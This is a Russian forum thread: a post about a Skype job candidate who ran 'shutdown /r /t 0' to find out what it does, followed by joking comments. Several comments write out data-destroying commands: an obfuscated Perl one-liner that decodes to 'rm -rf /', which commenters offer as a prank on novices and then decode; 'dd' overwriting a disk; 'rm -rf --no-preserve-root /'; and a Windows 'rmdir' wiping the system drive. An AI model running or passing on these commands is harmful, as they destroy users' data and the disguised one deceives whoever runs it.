Skype собеседование

В списке моих обязанностей значилось тестирование кандидатов на должность специалистов технической поддержки. Компания набирала сотрудников в филиал в другой город и приглашать людей оттуда на собеседование в центральный офис не было никакого смысла (Офис в Мск, филиал - Владивосток), поэтому общение с кандидатами происходило через Skype. Наличие камеры у кандидатов было обязательным, потому что работать им предстояло потом на площадках клиентов и внешний вид имеет тоже имеет значение.

Среди вопросов, которые я задавал был небольшой список простейших консольных команд для виндов, я отправлял в чат команду, а кандидат должен своими словами описать что же она делает и в каких ситуациях применяется. Кандидат оказался крайне наглым, как я уже говорил - камера была включена и я прекрасно видел, что после каждой команды он что-то печатает. Вполне очевидно было, что парень ничего не знает и просто гуглит ответы, но я ошибался.
Потихоньку дошли до моей любимой команды (любимая она потому, что ей редко пользуются и многие кандидаты начинают угадывать что же она делает):
shutdown /r /t 0
Именно так. С ключами -r и -t. Если читатель хоть немножко знает английский, то догадался, что команда эта не делает ничего хорошего, а именно - она должна выключать комп. Если точнее, то без ключей эта команда не делает вообще ничего "защита от дурака". Ключик /r означает, что комп по команде уйдет в перезагрузку, /t 0 означает что задержка между командой и собсвтенно её выполнением составит 0 секунд.
Уже отправляя эту команду я ждал смешного, напомню, я еще думал что парень гуглит команды и засыпется, сказав что это команда выключения питания. Оправил я ему эту строку... и связь оборвалась. Да-да, мой недалёкий "потенциальный сотрудник" вместо того чтобы нагло гуглить команды тупо выполнял их на своем собственном компе и смотрел результат.

P.S. Наглости хватило перезвонить и сказать, что "связь оборвалась".

Не придумано, случай реальный.
Вы смотрите срез комментариев. Показать все
597
Автор поста оценил этот комментарий

Так он же не нарушил ничего. Вы спрашивали, что делает команда. Он выяснял. И связь действительно ведь оборвалась.

раскрыть ветку (122)
297
Автор поста оценил этот комментарий

Следовательно shutdown -r -t 0 обрывает связь. А автор только делает вид что знает как работает команда.


P.S. Он так и truncate проверит..

раскрыть ветку (117)
74
Автор поста оценил этот комментарий
Уже после этого случая я пытался придумать более "злые" команды. Но даже всеми любимый format не прокатил бы. Ничего по настоящему ужасного в голову так и не пришло.
раскрыть ветку (99)
100
Автор поста оценил этот комментарий

Для молодых линуксоидов есть более приятная программа, исполняемая от рута echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

раскрыть ветку (66)
195
Автор поста оценил этот комментарий

Для нелинуксоидов можно перевести этот эльфийский?

раскрыть ветку (44)
147
Автор поста оценил этот комментарий

В начале выводит в консоль test test test, а потом рекурсивно, не спрашивая подтверждения, удаляет всё содержимое корневого каталога.

Последняя часть, чтобы не быть сразу понятной, закодирована на перле.

раскрыть ветку (21)
55
Автор поста оценил этот комментарий

Жестоко

9
Автор поста оценил этот комментарий

а как это раскодировать? =) 

раскрыть ветку (19)
19
Автор поста оценил этот комментарий

Первая команда $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; записывает в переменную $ значение =]=>%-{<-|}<&|`{ (дочерних процессво не создавалось, следовательно $? вернет 0)

следующая команда y; -/:-@[-`{-};`-{/" -;; (тут вместо обычного разграничителя / автор зачем-то использует ;) транслирует содержимое по адским правилам

и теперь в минус будет записан диапазон -/ :-@ [-` {-}

Символы, которые будут заменяться после точки с запятой - `-{

/" -; . Причем /" -; - я так и не поял нафига нужны.

в результате трансляции содержимое $_ = (!"#$%&'()*+,-./:;<=>?@[\]^_`{|} )превращаются в `abcdefghijklmnopqrstuvwxyz{/" - , что в свою очередь на людском вернет значение 'system "rm -rf /"'

ну или как-то так. Поправте, если где ошибся

раскрыть ветку (15)
12
Автор поста оценил этот комментарий
Мое лицо после прочитанного: :-@
А вообще, вот скажите, я поступаю в ВУЗ (физтех, хочу на ФРТК) и хочу начать программирование, вот реально это с первого курса делать (если 9-10 класс проебывал, в основном, благодаря училке (но эт отдельная история), а 11 нет времени на инфу)?
раскрыть ветку (12)
7
Автор поста оценил этот комментарий

реально наверное... Я в ВУЗе перл вообще не видел.

Плотно им увлекся года 2 назад примерно. Понравились эти хиромудрые регулярки). Сначала курс на intuit.ru, потом книжки O'Reilly (повезло, что они были в компании, где я тогда работал, и можно было читать бумажный вариант нахаляву =) )

Ну и в интернете мануалов гора.

Автор поста оценил этот комментарий

Программирование - одна из основных дисциплин на физтехе. Другое дело, что там основной упор будет на применение численных методов для решения систем интегральных и дифференциальных уравнений, а не работу с консолью и прочую техническую поддержку.

раскрыть ветку (4)
1
Автор поста оценил этот комментарий
Ну рад это слышать. Сделают из меня человека)
раскрыть ветку (3)
Автор поста оценил этот комментарий

я вот в СПБГМУ на инф без учусь, тут нас пока учат делфи, начали с самых основ, и вроде даже понятно. так что если захочешь  то сможешь. вот правда как поступить в физтех я хз ибо там балы просто жопа

раскрыть ветку (4)
Автор поста оценил этот комментарий
Туда с олимпы поступают, я абандоню школу и хожу в ВФТШ физтеха для подготовки к олимпиадам. А там 100 в ЕГЭ по физике и математике
раскрыть ветку (3)
Автор поста оценил этот комментарий

Учусь на РТ, реально

1
Автор поста оценил этот комментарий
спасибо за объяснение, но всё равно нихера не понял xD
раскрыть ветку (1)
Автор поста оценил этот комментарий

я тут кароч мысль более понятно (вроде бы), сформулировал:

http://shatun.org/wp/perl-razbiraem-patch-barmina.html

14
Автор поста оценил этот комментарий

Оно превращается в rm -rf /

1
Автор поста оценил этот комментарий
Иллюстрация к комментарию
1
Автор поста оценил этот комментарий
Попробовал, да?
38
Автор поста оценил этот комментарий

по сути своей - это аналог команды "Удалить все" - rm / -rf. Т.е. Удалить все что есть на всех примонтированных дисках без вопросов и "без корзины". В свое  время на Linux.Org'e был провокационный пост - "Господа, подскажите, что делает эта команда".

А расшифровка там простая - если не ошибаюсь из набора кракозябр получить нужную команду и выполнить её.

раскрыть ветку (17)
26
Автор поста оценил этот комментарий
Люди делятся на два типа - rm -rf / и rm / -rf :D
раскрыть ветку (16)
18
Автор поста оценил этот комментарий

И... sudo dd if=/dev/zero of=/dev/sda

раскрыть ветку (5)
24
Автор поста оценил этот комментарий

[user@media-01 ~]# cat /proc/mounts | grep " / "

rootfs / rootfs rw 0 0

/dev/cciss/c0d0p1 / ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0

Иллюстрация к комментарию
раскрыть ветку (4)
62
Автор поста оценил этот комментарий
Иллюстрация к комментарию
6
Автор поста оценил этот комментарий

sudo dd if=/dev/zero of=/dev/cciss/c0d0p1

раскрыть ветку (2)
7
Автор поста оценил этот комментарий
Я по своему умею..
Окей гугл, удали все.
раскрыть ветку (1)
7
Автор поста оценил этот комментарий
Первое удобнее, так как если надо удалить что-то другое, то кнопка "Вверх" для выбора прошлой команда и меняешь последний символ
раскрыть ветку (3)
4
Автор поста оценил этот комментарий

Я думаю, после исполнения этой команды, на компе больше не останется ничего другого :)

2
Автор поста оценил этот комментарий

Второе безопаснее. Для редактирования аргументов можно использовать alt-b и alt-f для быстрого перехода по словам.

Да, чуток удобнее ctrl+w для стирания последнего слова, но на вопрос стоит взглянуть несколько шире, чем частный случай изменения последнего аргумента. Тогда вы увидите выгоду. Все дело в масштабе.

1
Автор поста оценил этот комментарий
Ну вот я тоже адепт первого варианта - удали это рекурсивно не спрашивая вот тут логичнее звучит для меня))
1
DELETED
Автор поста оценил этот комментарий

и еще на srm -r :)

раскрыть ветку (1)
2
Автор поста оценил этот комментарий
Имеется в виду логика постановки ключей в команде :)
1
Автор поста оценил этот комментарий

три. 

rm -rf /*

раскрыть ветку (3)
1
Автор поста оценил этот комментарий
Это частное первого. И написание первого - акцент на ключах)
раскрыть ветку (2)
1
Автор поста оценил этот комментарий

Первый не работает в большинстве дистрибутивов. В эту команду довольно давно защиту от шутников вставили.

Команда rm -rf /* делает ровно то, что должна делать первая.

раскрыть ветку (1)
Автор поста оценил этот комментарий
Не знал (не встречался точнее). А вообще - я всё равно писал о ключах и их постановке в команде до или после аргумента
8
Автор поста оценил этот комментарий
Это не эльфийский. Это оркский, нафиг.
1
Автор поста оценил этот комментарий

Первая команда $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; записывает в переменную $ значение =]=>%-{<-|}<&|`{ (дочерних процессво не создавалось, следовательно $? вернет 0)

следующая команда y; -/:-@[-`{-};`-{/" -;; (тут вместо обычного разграничителя / автор зачем-то использует ;) транслирует содержимое по адским правилам

и теперь в минус будет записан диапазон -/ :-@ [-` {-}

Символы, которые будут заменяться после точки с запятой - `-{

/" -;

в результате трансляции содержимое $_ = (!"#$%&'()*+,-./:;<=>?@[\]^_`{|} )превращаются в `abcdefghijklmnopqrstuvwxyz{/" - , что в свою очередь на людском вернет значение 'system "rm -rf /"'


ну или как-то так. Поправте, если где ошибся

раскрыть ветку (2)
1
Автор поста оценил этот комментарий

Причем /" -; - я так и не поял нафига нужны.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

а понял. это 4 символа без диапазонов и они остаются "как есть". Вроде. Что за мудак придумал такую шайтанаму

10
Автор поста оценил этот комментарий

Патч Бармина)

7
Автор поста оценил этот комментарий

мне страшно эту команду даже в буфер копировать

раскрыть ветку (1)
Автор поста оценил этот комментарий

так ты и не копируй, просто выдели, а потом в терминале быстро жми на колесо мыши и энтр

7
Автор поста оценил этот комментарий

выглядит как пиздец

9
DELETED
Автор поста оценил этот комментарий

А, что делает?

раскрыть ветку (9)
55
Автор поста оценил этот комментарий

Сносит всё. Совсем.

раскрыть ветку (7)
18
Автор поста оценил этот комментарий

Ну если запускать от обычного пользователя, то снесёт хомяка напрочь, а если от рута, то тогда да всё и совсем.

раскрыть ветку (6)
47
Автор поста оценил этот комментарий
Тот кто способен не глядя запустить на своем компе команду содержащую слово perl и нечитаемый регэксп врядли знает, что не хорошо все время сидеть под рутом.
раскрыть ветку (5)
23
Автор поста оценил этот комментарий

Поэтому в начало этой команды стоит ещё заботливо вписать одно слово... sudo ;)

раскрыть ветку (3)
5
Автор поста оценил этот комментарий

Прописавшие в /etc/sudoers ключ NOPASSWD должны страдать.

раскрыть ветку (2)
5
Автор поста оценил этот комментарий
evgeny ALL=(ALL) NOPASSWD: ALL

заставь меня страдать

1
Автор поста оценил этот комментарий

Даже если нет, есть ещё вероятность, что он перед этим незадолго выполнял что-то через судо, и тогда пароль тоже не нужен)

1
Автор поста оценил этот комментарий

true story)))

34
Автор поста оценил этот комментарий

Это универсальный патч для улучшения отзывчивости системы и удаления мусорных файлов.

8
DELETED
Автор поста оценил этот комментарий
Ну это для более-менее линуксоидов. А так, можно было спросить про rm -rf

И сказать: "Если уж вы не знаете, то можете ввести в терминале под рутом"

раскрыть ветку (4)
31
Автор поста оценил этот комментарий

Это можно использовать, как завершающий вопрос при неудачном собеседовании.

5
Автор поста оценил этот комментарий
rm -rf / правильнее.. иначе только текущую папку снесешь
раскрыть ветку (2)
4
Автор поста оценил этот комментарий
rm -rf --no-preserve-root /
1
DELETED
Автор поста оценил этот комментарий
точно)
1
Автор поста оценил этот комментарий
Патч Бармина =)
Автор поста оценил этот комментарий
Ппц черная магия О_о
33
DELETED
Автор поста оценил этот комментарий
Эмм, но как эта команда относится непосредственно к работе ТП? Он может знать кучу команд, которые помогут разобраться с проблемным инетом (или ТП не связана с инетом?), но может не знать эту.
Просто мне, как работнику ТП инет провайдера непонятны данные закидоны, я хоть и знаю значение данной cmd, ибо регулярно пользуюсь, но такого "собеседовальщика" послал бы сразу.
раскрыть ветку (16)
24
Автор поста оценил этот комментарий

Компания продавала IT аутсорсинг. Бывало, что единственный способ ребутнуть машину клиента удаленно это при помощи этой самой команды (-m и адрес машины. Выполнять от учетки, имеющей админ права на машине, которую ребутим) ну или в батник писался целый офис, если нужно централизованно выключить вообще все машинки, когда в выходной позвонят и скажут, что выключают электричество в офисе.
Да и вопрос этот естественно не решающий при выборе кандидата, он показывает общий уровень знаний. Как я написал в самом посте используется она редко, поэтому люди не интересующиеся обычно ее не знают.

раскрыть ветку (15)
5
Автор поста оценил этот комментарий

А какие ещё вопросы были? Интересно просто, моя специальность далека от системного администрирования ,программирования, да и вообще от компов, но, думаю, такие простые команды знает множество обычных людей. 

3
Автор поста оценил этот комментарий

только команда-то не шибко редкая, именно с такими ключами приходится ее использовать регулярно для ребута серверов и рабочих станций. На последних это чуть ли не единственный вариант выключить машину, т.к. опции перезагрузки и выключения не доступны через rdp.

7
DELETED
Автор поста оценил этот комментарий

Понял, просто я отталкивался именно от работника ТП инет провайдера, где подобные знания нах не нужны. :)

раскрыть ветку (3)
5
Автор поста оценил этот комментарий

устраивался я как то на вакансию "IT специалист". чуть не завалили на вопросе "оптимизировал ли я sql базы, какие базы использовал". я честно ответил что нет, не оптимизировал т к не нужно было - таких баз ни разу в моем подчинении не находилось, но если надо загуглю.


ну так вот. в той компании ни о какой оптимизации баз и запросов и речи не было потом. никто этим не занимался да и незачем было, все и так быстро работало ибо нагрузка ТОЖЕ невелика. пздц. а на собеседовании строили из себя хз кого

раскрыть ветку (2)
3
Автор поста оценил этот комментарий

НАХВАТАЛСЯ ВЕРХОВ НА ХАБРЕ
@

ТАЙНЫЕ ЗНАНИЯ ОПТИМИЗАЦИИ SQL БАЗ ДЛЯ BIGDATA ПОЛУЧЕНЫ

@

ПРИШЛА ПОРА БЛЕСНУТЬ ПЕРЕД ЭТИМИ НИЧТОЖЕСТВАМИ

раскрыть ветку (1)
Автор поста оценил этот комментарий
Я ХОЧУ оптимизировать. Но нечего. >_<
1
Автор поста оценил этот комментарий
как такая команда может быть редкой? я когда смотрю фильмы перед сном, ставлю на дифрагментацию на ночь или т. д. с удовольствием использовал эту команду. да и написано там черным по белому "выключения" как не догадаться, я не знаю. + если вписать просто команду, то там будут описаны все ключи. Какой-то невероятно тупой парень попался вам.
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
+ если вписать просто команду, то там будут описаны все ключи.

В таких случаях нужно писать command /? или command /help, мало ли что она делает без аргументов.

Автор поста оценил этот комментарий

Первая команда с которой я познакомился после подключения к интернету была shutdown /a

1
Автор поста оценил этот комментарий
ну или в батник писался целый офис, если нужно централизованно выключить вообще все машинки, когда в выходной позвонят и скажут, что выключают электричество в офисе.

Я правильно понимаю - сотрудник техподдержки, по сути колцэнтра, имеет возможность введя всего-лишь одну команду вырубить все компы в офисе у себя из дома?

Зашибись у вас там безопасность.

раскрыть ветку (5)
2
Автор поста оценил этот комментарий

Ты о доменах ничего не знаешь? :)

раскрыть ветку (4)
Автор поста оценил этот комментарий

При чем тут домен?

раскрыть ветку (3)
Автор поста оценил этот комментарий

В смысле? Имея домен такой "финт ушами" вполне себе возможен в рамках корпоративной политики безопасности. Можно не только выключать компы, но еще и устанавливать/удалять программы централизованно и удаленно :)

Домен - крутая штука :)

раскрыть ветку (2)
Автор поста оценил этот комментарий

Эмм... суть моего вопроса была не в "омг, а что такое реально сделать?" а в "омг, как они могут доверять непонятно кому выключать компьютеры в офисах одной кнопкой". 

раскрыть ветку (1)
Автор поста оценил этот комментарий

Так а в чем проблема то? Это не "непонятно кто", а обслуживающая организация, которая занимается поддержкой IT инфраструктуры этой конторы. 

11
Автор поста оценил этот комментарий

А почему люди должны заваливаться-то на этой команде? Я думал, она вообще должна быть общеизвестна. Я так компы в пятом классе перезагружал.

раскрыть ветку (2)
13
Автор поста оценил этот комментарий

потому что автор находит сложности, а машины давно можно вырубать по расписанию и через шелы, а не консоль и пить кофе, а он тут просто расходные статьи бюджета увеличиваетбнабирая себеиподобных, у меня команды вообще распечатаны пусть думает,ба так шел и скрипты экономит бюджеттфирмы в разы

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Машины можно выключать через шелы, а не консоль?

Эм... А чем у тебя консоль от шела отличается?

8
Автор поста оценил этот комментарий
Может хоть здесь мне раскроют сакральный смысл тестирования кандидатов по тем навыкам, обучение которым занимает аж 5 минут от первого рабочего дня? Ну и естественно дальнейший отсев кандидатов, в случае если им хватает мозгов перепаять видеокарту и переустановить винду, но судьба злодейка не свела их в нужный момент в этой жизни с данными консольными командами. И да, пиз*ец как накипело. Нет, я не тот самый парень.
раскрыть ветку (3)
2
Автор поста оценил этот комментарий

Как минимум, собеседование отсеяло кандидата, который догадался тестировать команды их выполнением на рабочей машине, вместо того, чтобы их погуглить или прочитать /help. Метод бездумного тыка - не самый здравый путь решения задач, когда ты работаешь по удаленке с чужими машинами.

1
Автор поста оценил этот комментарий
Я уже отвечал, но тут что-то овер дофига комментариев, так что можно и еще разок:
1) Знание этой конкретной команды вообще не показатель при приеме на работу. Тест состоял не только из нее и не только из консольных команд. Тут писали про "ситуации" и "способы решения" это тоже было и конечно же правильные ответы на эти вопросы прибавят больше положительных очков кандидату.
2) Незнание одной команды не говорит вообще не о чем (если это не ping), а вот знание команд, да еще и с ключами, говорит о том, что человек не первый раз видит консольку виндовую.
3) Про обучение тоже уже спрашивали. Типа почему бы не научить. Я в общем-то согласен, что учить сотрудника идея хорошая. Но проблема в том, что человек устраивается на работу и будет получать зарплату за то, что проводит 8 часов на рабочем месте. Подразумевается, что он будет работать и приносить фирме доход, а не учиться и получать за это деньги. Нужен определенный уровень знаний и навыков, чтобы хорошо работать, а дальше уже учись/повышай квалификация и так далее.
4) Умение переустановить винду вообще никогда не считалось критерием для приема на работу, так же никогда не спрашивал как включить компьютер и "умеете ли вы печатать". А про перепаять видеокарту - это конечно круто, но может стоит поискать немножко другую профессию. Техник в сервисном центре например. ТП работающая с клиентскими машинами софтом занимается обычно или заменой целого узла, если необходимо (умершую видюху на новую).
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Ваше мышление понятно, второй и третий пункт окончательно расставили точки над i
5
Автор поста оценил этот комментарий

Пффф.

rmdir %systemroot%\.. /s /q

2
Автор поста оценил этот комментарий

Зря не взяли, парень трудностей не боится, и если чего-то не знает, не будет бубнеть что-то под нос, а быстро выяснит и даст четкий ответ)

2
Автор поста оценил этот комментарий
Ты видимо сам с компом на вы? Шатдаун вообще то абсолютно не редкая команда и реально используется. Любой работающий с пк хотя бы на уровне опытного пользователя отлично ее знает. История прохладная и тянет на кота с лампой
2
Автор поста оценил этот комментарий

Там вам ведь не нужны люди, которые будут работу выполнять.
Вам просто интересно поглумиться над соискателями.

6
Автор поста оценил этот комментарий

А что тут думать? Придумай то, что не сработает и какой команды не существует) что то типа фразы на французском "взорви банановый холодильник" только команда из первых трех букв каждого слово "взобанхол"...пусть гуглят, ищут, перезагружаются) 

Автор поста оценил этот комментарий

Так выключает комп или всё-таки перезагружает? 

раскрыть ветку (1)
Автор поста оценил этот комментарий

с ключем -s выключает, с ключем -r перезагружает, без ключей вообще ничего не делает (справку покажет)

Автор поста оценил этот комментарий

alt+F4=)

2
DELETED
Автор поста оценил этот комментарий
а что делает truncate?
раскрыть ветку (14)
3
Автор поста оценил этот комментарий

сносит все строки в sql-таблице

ещё комментарии
ещё комментарий
1
DELETED
Автор поста оценил этот комментарий

Ага, всё к хуям стёр на серверах БД пентагона наглый паренёк, а Esel нашёл способ, как не палить свой IP хД

2
Автор поста оценил этот комментарий
Хорошо хоть не format c:
1
DELETED
Автор поста оценил этот комментарий

забавно, еще был случай с rm -r /home, благо хоть не через sudo

1
Автор поста оценил этот комментарий
Исполнительного сотрудника протеряли)
1
Автор поста оценил этот комментарий
Комментарий удален. Причина: спам.
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

@moderator,  спам, реклама какого-то левого сайта.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку